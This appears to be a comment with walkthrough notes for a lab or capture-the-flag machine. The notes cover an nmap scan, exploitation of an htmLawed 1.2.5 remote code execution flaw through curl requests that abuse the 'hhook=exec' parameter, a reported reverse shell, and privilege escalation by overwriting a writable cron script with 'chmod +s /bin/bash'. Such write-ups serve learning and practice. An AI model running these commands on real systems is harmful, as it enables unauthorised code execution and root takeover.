WDavid404
commented
1 month ago PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.56 ((Debian))80/tcp
-->
HTMLAWED 1.2.5
exploit info search for HTMLAWED 1.2.5
--> https://www.exploit-db.com/exploits/52023 (htmlLawed 1.2.5 - Remote Code Execution (RCE))
curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/'
-->
curl -s -d "sid=foo&hhook=exec&text=whoami" -b "sid=foo" 192.168.214.190 -x 127.0.0.1:8080
-->
then,
--> got a reverse shell successfully.
PE
linpeas --> didn't find interesting thing
pspy64 -->
we can edit /var/www/cleanup.sh file
Run echo "chmod +s /bin/bash" > /var/www/cleanup.sh
After a while, we can see:
Keypoints: